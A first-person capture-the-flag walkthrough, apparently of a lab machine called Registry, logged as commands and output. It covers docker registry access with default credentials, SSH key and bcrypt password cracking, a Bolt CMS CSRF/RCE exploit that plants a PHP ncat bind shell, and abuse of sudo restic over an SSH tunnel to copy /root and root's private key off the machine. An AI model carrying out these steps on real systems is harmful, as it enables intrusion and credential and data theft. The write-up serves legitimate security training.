< back


LHOST: xx.xx.xx.xx

Initial Enumeration

As always started off with an nmap scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-06 08:44 EST
Nmap scan report for
Host is up (0.35s latency).
Not shown: 997 closed ports
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     nginx 1.14.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.21 seconds

nginx webserver with HTTP and HTTPs ports open. Requests to both ports just led to the default nginx page. Since 443 has a self-signed cert just like the Mango box I took a look at the cert to see if we had another vhost setup we could go to.

There is a docker.registry.htb shown on the cert, so I added it to my /etc/hosts file but all the request returned was a 200 OK with no content.

I moved onto enumeration of URL paths with gobuster.

root@kali:~# /home/kali/go/bin/gobuster dir -u registry.htb -w /usr/share/wordlists/dirb/common.txt 
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://registry.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/02/06 08:48:18 Starting gobuster
/.hta (Status: 403)
/.bash_history (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/install (Status: 301)
/test (Status: 301)
2020/02/06 08:51:51 Finished

Found some paths of interest, /install and /test.

/test gave a 403 forbidden response, and /install returned some binary data.

root@kali:~# http --follow registry.htb/test
HTTP/1.1 403 Forbidden
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html                                                                                                                                                        
Date: Thu, 06 Feb 2020 13:54:45 GMT                                                                                                                                            
Server: nginx/1.14.0 (Ubuntu)                                                                                                                                                  
Transfer-Encoding: chunked

<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>

root@kali:~# http --follow registry.htb/install
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Thu, 06 Feb 2020 13:54:52 GMT
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

| NOTE: binary data not shown in terminal |

I downloaded the binary data onto my system to take a closer look. It seemed to be a gzip'd archive.

root@kali:~# wget registry.htb/install
--2020-02-06 08:54:34--  http://registry.htb/install
Resolving registry.htb (registry.htb)...
Connecting to registry.htb (registry.htb)||:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://registry.htb/install/ [following]
--2020-02-06 08:54:34--  http://registry.htb/install/
Reusing existing connection to registry.htb:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘install’

install                                         [ <=>                                                                                       ]   1.03K  --.-KB/s    in 0s      

2020-02-06 08:54:35 (56.6 MB/s) - ‘install’ saved [1050]

root@kali:~# file install
install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original size modulo 2^32 167772200 gzip compressed data, reserved method, has CRC, was "", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 167772200

I extracted the archive and found two files inside.

root@kali:~# tar -xvf install -C registry-binary/

gzip: stdin: unexpected end of file
tar: Child returned status 1
tar: Error is not recoverable: exiting now
root@kali:~# ls registry-binary/
ca.crt  readme.md

A certificate and a readme file.

root@kali:~# cat registry-binary/ca.crt 
root@kali:~# cat registry-binary/readme.md 
# Private Docker Registry

- https://docs.docker.com/registry/deploying/
- https://docs.docker.com/engine/security/certificates/

Looks like the docker subdomain we found at the start is relevant after all. I've had some experience with docker before but docker registries are a new concept to me, time to do some reading!

Docker registry

OK so after reading the manual a bit, I now know a docker registry contains docker images, and you can self host docker registries. Evidently there's a self hosted docker registry at docker.registry.htb which we need to access.

There's an HTTP API available with docker registry but unfortunately in our case the registry has authentication enabled.

root@kali:~# http --verify=no https://docker.registry.htb/v2/
HTTP/1.1 401 Unauthorized
Connection: keep-alive
Content-Length: 87
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 14:23:43 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Www-Authenticate: Basic realm="Registry"
X-Content-Type-Options: nosniff

    "errors": [
            "code": "UNAUTHORIZED",
            "detail": null,
            "message": "authentication required"

In order to login to the docker registry we use the docker login command. I'll try admin:admin.

root@kali:~# docker login docker.registry.htb
Username: admin
Error response from daemon: Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority

The cert from the registry is self-signed so the login command doesn't work OOTB. Luckily we came across the cert earlier from the /install path, and from the docs linked in the readme.md file I know to place it in /etc/docker/certs.d/docker.register.domain/

root@kali:~# mkdir -p /etc/docker/certs.d/docker.registry.htb/
root@kali:~# mv /etc/docker/certs.d/
root@kali:~# mv /etc/docker/certs.d/ca.crt /etc/docker/certs.d/docker.registry.htb/
root@kali:~# docker login docker.registry.htb
Username: admin
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See

Login Succeeded

Yay! We managed to login on the first try with the creds admin:admin.

Since we have working credentials for the docker registry, let's return to the HTTP API and see what the registry contains.

root@kali:~# http --verify=registry-binary/ca.crt -a admin:admin https://docker.registry.htb/v2/
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 2
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 15:53:21 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
X-Frame-Options: DENY


root@kali:~# http --verify=registry-binary/ca.crt -a admin:admin https://docker.registry.htb/v2/_catalog
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 32
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 15:54:42 GMT
Docker-Distribution-Api-Version: registry/2.0
Server: nginx/1.14.0 (Ubuntu)
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
X-Content-Type-Options: nosniff
X-Frame-Options: DENY

    "repositories": [

OK, looks like there's an image we can pull called bolt-image, so let's pull it from the registry.

root@kali:~# docker pull docker.registry.htb/bolt-image
Using default tag: latest
latest: Pulling from bolt-image
f476d66f5408: Pull complete 
8882c27f669e: Pull complete 
d9af21273955: Pull complete 
f5029279ec12: Pull complete 
2931a8b44e49: Pull complete 
c71b0b975ab8: Pull complete 
02666a14e1b5: Pull complete 
3f12770883a6: Pull complete 
302bfcb3f10c: Pull complete 
Digest: sha256:eeff225e5fae33dc832c3f82fd8b0db363a73eac4f0f0cb587094be54050539b
Status: Downloaded newer image for docker.registry.htb/bolt-image:latest

Now let's run the docker image and attach ourself to the running bolt-image container.

root@kali:~# docker run -d -it -p 80:80 docker.registry.htb/bolt-image
root@kali:~# docker attach 69fcf6aa5ea422306bcd9d8ad5030ee3f02b82d395c06990197b2a67d97abbb9

Finding secrets in the dev environment

Alright let's have a closer look. Since this seems to be an image for the Bolt CMS system, my first instinct is to look at the /var/www directory.

root@69fcf6aa5ea4:/# ls /var/www/html/
index.html  sync.sh

OK, just one html file and a bash script called sync.sh

root@69fcf6aa5ea4:/# cat /var/www/html/sync.sh 
rsync -azP registry:/var/www/html/bolt .

rsync uses the same syntax as ssh so looking at the ssh config file we can see what is setup for the host named registry

root@69fcf6aa5ea4:/# cat /root/.ssh/config 
Host registry
  User bolt
  Port 22
  Hostname registry.htb

So running the sync.sh script will copy the bolt directory over from registry.htb using the user bolt. Let's give it a shot.

root@69fcf6aa5ea4:/# bash /var/www/html/sync.sh 
ssh: Could not resolve hostname registry.htb: Name or service not known
rsync: connection unexpectedly closed (0 bytes received so far) [Receiver]
rsync error: unexplained error (code 255) at io.c(235) [Receiver=3.1.2]
root@69fcf6aa5ea4:/# echo ' registry.htb' >> /etc/hosts
root@69fcf6aa5ea4:/# bash /var/www/html/sync.sh 
Warning: Permanently added the ECDSA host key for IP address '' to the list of known hosts.
Enter passphrase for key '/root/.ssh/id_rsa': 

Oops looks like we need a passphrase to unlock the RSA key.

root@69fcf6aa5ea4:/# cat /root/.ssh/id_rsa
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9


Let's get our familiar friend john to give us a hand.

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt bolt_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 4 needed for performance.
0g 0:00:00:04 DONE (2020-02-06 11:27) 0g/s 3304Kp/s 3304Kc/s 3304KC/sa6_123..*7¡Vamos!
Session completed

Shit... no luck with the rockyou.txt wordlist. I tried a few more wordlists.

root@kali:~# john --wordlist=/root/all.txt bolt_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2020-02-06 11:40) 0g/s 3410Kp/s 3410Kc/s 3410KC/s {kjhfn..{ysrfk
Session completed
root@kali:~# john --wordlist=/root/Downloads/crackstation-human-only.txt bolthash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
0g 0:00:00:21 DONE (2020-02-06 11:54) 0g/s 2906Kp/s 2906Kc/s 2906KC/s ����
Session completed

Did a search for bash scripts on the system and found an interesting one /etc/profile.d/01-ssh.sh, the usecase seems to be adding the RSA key to ssh-agent so the user doesn't have to type their passphrase everytime the key is being used, now we have the ssh key passphrase GkOcz221Ftb3ugog!

root@69fcf6aa5ea4:/# find / -name '*.sh'
root@69fcf6aa5ea4:/# cat /etc/profile.d/01-ssh.sh
#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"

I ssh'd into the registry box and grabbed the user flag.

root@69fcf6aa5ea4:/# ssh registry       
Enter passphrase for key '/root/.ssh/id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Thu Feb  6 17:23:23 UTC 2020

  System load:  0.0               Users logged in:                0
  Usage of /:   5.7% of 61.80GB   IP address for eth0:  
  Memory usage: 24%               IP address for br-1bad9bd75d17:
  Swap usage:   0%                IP address for docker0:
  Processes:    153
Last login: Thu Feb  6 16:06:42 2020 from
bolt@bolt:~$ ls
bolt@bolt:~$ cat user.txt

Hol' up back it up there

Again I headed to /var/www since the box is running Bolt CMS. Came across a sqlite db file, as well as a backup.php which looked interesting.

bolt@bolt:~$ ls -lah /var/www/html
total 28K
drwxrwxr-x  4 www-data www-data 4.0K Oct 21 08:41 .
drwxr-xr-x  4 root     root     4.0K May 26  2019 ..
-rw-r--r--  1 root     root       85 May 25  2019 backup.php
-rw-------  1 git      www-data    0 Oct  8 21:54 .bash_history
drwxrwxr-x 11 www-data www-data 4.0K Oct 21 08:27 bolt
-rwxrwxr-x  1 www-data www-data  612 May  6  2019 index.html
-rw-r--r--  1 root     root      612 Oct 21 08:41 index.nginx-debian.html
drwxr-xr-x  2 root     root     4.0K Sep 26 21:13 install
bolt@bolt:~$ ls /var/www/html/bolt/
app           codeception.yml  composer.lock    extensions  index.php   phpunit.xml.dist  src    theme
changelog.md  composer.json    CONTRIBUTING.md  files       LICENSE.md  README.md         tests  vendor
bolt@bolt:~$ ls /var/www/html/bolt/app
bootstrap.php  cache  config  database  deprecated.php  nut  resources  src  theme_defaults  view  web.php
bolt@bolt:~$ ls /var/www/html/bolt/app/database/
bolt@bolt:~$ file /var/www/html/bolt/app/database/bolt.db 
/var/www/html/bolt/app/database/bolt.db: SQLite 3.x database, last written using SQLite version 3022000
bolt@bolt:~$ ls -lah /var/www/html/bolt/app/database/bolt.db
-rw-r--r-- 1 www-data www-data 288K Feb  7 07:55 /var/www/html/bolt/app/database/bolt.db

First let's look at the backup.php file.

bolt@bolt:~$ cat /var/www/html/backup.php 
<?php shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");

Looks like a certain user on the system can run restic with root priveleges. I tried with bolt but no luck, so I'm assuming we need to pivot over to www-data. Seems I'll need to create my own restic server later and use sudo restic to transfer the root flag over.

Next I pulled the sqlite db file down to my localhost to peek inside.

root@kali:~# scp -i boltkey [email protected]:/var/www/html/bolt/app/database/bolt.db bolt.db
Enter passphrase for key 'boltkey': 
bolt.db                                                                                                                                      100%  288KB  46.9KB/s   00:06    
root@kali:~# sqlite3 bolt.db 
SQLite version 3.31.0 2019-12-29 00:52:41
Enter ".help" for usage hints.
sqlite> .tables
bolt_authtoken    bolt_field_value  bolt_pages        bolt_users      
bolt_blocks       bolt_homepage     bolt_relations  
bolt_cron         bolt_log_change   bolt_showcases  
bolt_entries      bolt_log_system   bolt_taxonomy   
sqlite> select * from bolt_users;
1|admin|$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK|[email protected]|2020-02-07 07:56:30||Admin|["files://nosus.php"]|1||||0||["root","everyone"]

Dank. We got a hash for the Bolt CMS admin password. We can see $2y$ at the start so it's hashed with bcrypt. A little help from john again.

root@kali:~# echo '$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK' > boltpwhash
root@kali:~# john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt boltpwhash 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       (?)
1g 0:00:00:03 DONE (2020-02-07 03:22) 0.2890g/s 104.0p/s 104.0c/s 104.0C/s strawberry..brianna
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And we got the creds admin:strawberry. I tried the password strawberry on the registry box user bolt but no luck. So I just used the creds to login to the Bolt CMS admin portal, since there are exploits available for authenticated users.

root@kali:~# searchsploit bolt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                        |  Path
                                                                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow                                                              | exploits/multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery                                                                                          | exploits/php/webapps/47501.txt
Bolt CMS 3.6.4 - Cross-Site Scripting                                                                                                 | exploits/php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution                                                                   | exploits/php/webapps/46664.html
Bolt CMS < 3.6.2 - Cross-Site Scripting                                                                                               | exploits/php/webapps/46014.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities                                                           | exploits/php/webapps/36552.txt
Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow                                                                               | exploits/multiple/remote/24982.txt
CMS Bolt - Arbitrary File Upload (Metasploit)                                                                                         | exploits/php/remote/38196.rb
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities                                                                           | exploits/php/webapps/21132.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Reverse reverse shell

I used the exploit that leverages CSRF for RCE detailed in /usr/share/exploitdb/exploits/php/webapps/46664.html There was one big wall in the way though, the box was setup in a way so that it couldn't initiate any outgoing connections. That meant that I couldn't use a reverse shell as I couldn't dial out to my localhost from the registry box. Instead of a reverse shell, I used a netcat bind shell. The nc binary on the remote host was compiled without the -e flag enabled so I grabbed a prebuilt static linked binary from here and scp'd it over. Then using the CSRF/RCE technique I uploaded my malicious php script into the bolt upload directory.

<?php exec("/tmp/ncat -vnlp 8888 -e /bin/bash"); ?>

I then dialed into the remote host from my local, and used the python pty trick to get a fully interactive shell as www-data

root@kali:~# nc registry.htb 8888
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bolt:~/html/bolt/files/2020-02$ ^Z
[1]+  Stopped                 nc registry.htb 8888
root@kali:~# stty raw -echo
root@kali:~# nc registry.htb 8888

We saw earlier in the backup.php file that we could probably use the restic command with sudo, and checking sudo -l confirmed this. Now we just needed to do some careful manipulation in order to run restic as root to be able to read and transfer /root back to our localhost.

www-data@bolt:~/html/bolt/files/2020-02$ sudo -l
Matching Defaults entries for www-data on bolt:
    env_reset, exempt_group=sudo, mail_badpass,

User www-data may run the following commands on bolt:
    (root) NOPASSWD: /usr/bin/restic backup -r rest*

First I setup restic-server on my localhost, initiated a restic repo and started the server.

root@kali:~# restic init --repo /root/restic-shit/
enter password for new repository: 
enter password again: 
created restic repository 97b64df299 at /root/restic-shit/

Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.

root@kali:~# rest-server --no-auth --path /root/restic-shit
Data directory: /root/restic-shit
Authentication disabled
Private repositories disabled
Starting server on :8000

Then I used ssh to remote forward port 8000 to the registry box since it couldn't dial out to my box. This meant that I could point to localhost:8000 on the remote host and have it resolve back to my actual localhost:8000.

ssh -N -R 8000:localhost:8000 -i boltkey [email protected]

Now to copy over the /root directory.

</restic backup -r rest:http://localhost:8000 /root/
enter password for repository: 
password is correct
found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan [/root]
scanned 10 directories, 14 files in 0:00
[0:03] 100.00%  28.066 KiB / 28.066 KiB  24 / 24 items  0 errors  ETA 0:00 
duration: 0:03
snapshot 0db157c0 saved
www-data@bolt:~/html/bolt/files/2020-02$ ping

Checking the restic backups on my localhost I can see that the /root dir from remote is there, now I just need to restore it to a location on my localhost and read the files.

root@kali:~# restic -r rest:http://localhost:8000/ snapshots
enter password for repository: 
repository 97b64df2 opened successfully, password is correct
ID        Time                 Host        Tags        Paths
0db157c0  2020-02-07 11:41:46  bolt                    /root
2 snapshots
root@kali:~# restic -r rest:http://localhost:8000/ restore 0db --target /tmp/restore
enter password for repository: 
repository 97b64df2 opened successfully, password is correct
restoring <Snapshot 0db157c0 of [/root] at 2020-02-07 16:41:46.2119485 +0000 UTC by root@bolt> to /tmp/restore
root@kali:~# ls /tmp/restore/
root@kali:~# cd /tmp/restore/root/
root@kali:/tmp/restore/root# ls
config.yml  cron.sh  root.txt
root@kali:/tmp/restore/root# cat root.txt 

Since we also grabbed the private key for root we can also login via ssh!

root@kali:/tmp/restore/root# cat .ssh/id_rsa
root@kali:/tmp/restore/root# ssh -i .ssh/id_rsa [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Fri Feb  7 17:14:55 UTC 2020

  System load:  0.0               Users logged in:                2
  Usage of /:   5.7% of 61.80GB   IP address for eth0:  
  Memory usage: 43%               IP address for docker0:
  Swap usage:   0%                IP address for br-1bad9bd75d17:
  Processes:    172
Last login: Fri Feb  7 16:58:08 2020 from
root@bolt:~# id
uid=0(root) gid=0(root) groups=0(root)